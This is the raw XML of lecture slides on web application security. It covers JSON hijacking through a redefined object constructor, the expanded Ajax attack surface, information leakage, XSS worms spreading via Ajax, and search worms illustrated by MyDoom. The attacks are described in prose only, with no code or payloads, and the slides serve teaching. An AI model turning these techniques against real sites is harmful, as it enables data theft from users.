          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In other words, this request will be handled just as though it had originated from the legitimate application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>When the JSON array arrives on the client, it will be evaluated in the context of the malicious page. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In order to witness the evaluation of the JSON, the malicious page has redefined the JavaScript function used to create new objects. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In this way, the malicious code has inserted a hook that allows it to get access to the creation of each object and transmit the object's contents back to the malicious site. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>If the user is not logged into the vulnerable site, the attacker can compensate by asking the user to log in and then displaying the legitimate login page for the application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>This is not a phishing  attack—the attacker does not gain access to the user's credentials—so anti-phishing countermeasures will not be able to defeat the attack.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en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>AJAX Security </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>10 Ajax Security Holes - http://www.net-security.org/article.php?id=956&amp;p=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12186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16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0B21E1D-43EC-40D7-9D81-7B01F01A835D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71684" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2667000"/>
            <a:ext cx="8382000" cy="3489325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Increased Attack Surface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Unlike traditional Web applications that exist almost entirely on the server, Ajax applications extend across the client and server. Such implementations require a trust relationship between the client and server—a relationship that can be exploited by an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>An Ajax Web application, however, sends many small requests, which create more inputs into the application. These inputs, sometimes called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" i="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Ajax endpoints</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>, provide more ways for an attacker to get into the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>A Web 2.0 application has several endpoints for Ajax as compared to its predecessor Web 1.0. Potential Ajax calls are scattered all over the browser page and can be invoked by respective events. Not only does this scattering of Ajax calls make it difficult for developers to handle, but also tends to induce sloppy coding practices given the fact that these calls are hidden and not easily obvious.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Information Leakage </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The JavaScript in the Ajax engine traps the user commands and makes function calls in clear text to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Function calls provide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1300" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>how to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1300" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> information for each user command that is sent. This information, being sent in clear text, in essence places the attacker inside the application. From this vantage point, the attacker possesses function names, variable names, function parameters, return types, data types, and valid data ranges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71685"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09600" y="1177925"/>
            <a:ext cx="7772400" cy="1524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a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>AJAX Security (cont..)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122884"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27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61F31C8-8DD1-4591-877B-6402B646C28F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72708" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Repudiation of Requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Browser requests and Ajax engine requests look identical. This fact means it is very difficult for an individual to prove that they did not do a certain action. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>It also means that JavaScript can make a request for a resource using Ajax that occurs in the background without the user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1300" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>s knowledge. The browser will automatically add the necessary authentication or state-keeping information such as cookies to the request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>AJAX Amplifies XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>With Ajax, XSS can make malicious requests with a user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1300" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>s credentials, without refreshing the Web page. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Such activity drastically increases the damage and theft of information capable through XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>With Ajax applications, XSS can propagate like a virus. The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily reinject the same host with more XSS, all of which can be done with no hard refresh. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Untrusted Information Sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Web 2.0 applications fetch information from various untrusted sources such as feeds, blogs, search results. This content is never validated prior to being served to the end browser, leading to cross-site exploitation. It is also possible to load JavaScript in the browser that forces the browser to make cross-domain calls and opens up security holes. This can be lethal and leveraged by virus and worms. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3"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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Search Worms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13210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37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A65071-461B-4F8C-B9AF-6BAA440093B8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73732" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Search worms  automate finding of vulnerable web servers by sending carefully crafted queries to search engines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Such worms spread by using popular search engines to find new attack vectors. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Note that this eliminates the need for worms to randomly scan hosts in the network  to find targets. This also helps them evade common detection methods.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>These worms not only put significant load on search engines, they also evade detection mechanisms that assume random scanning.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Search Worms work as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Generate Search Query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Analyze Search Results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Infect Identified Targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="B88472"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" i="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Provos, N., McClain, J., and Wang, K. 2006. Search worms. In Proceedings of the 4th ACM Workshop on Recurring Malcode (Alexandria, Virginia, USA, November 03 - 03, 2006). WORM '06. ACM, New York, NY,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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Search Worm Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133124"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47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A369592-8647-495B-90F3-642C9B54CF32}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74756" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>MyDoom.O (July 2004)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>MyDoom was a worm that propagated via email. The email claims to be from a company</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1500">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1500">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>s support department and contains an executable file as an attachment. When a user executes it, the worm gets activated and searches the local hard disk for email addresses of other users to infect. As a result, the worm propagates along the social network of the infected users. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
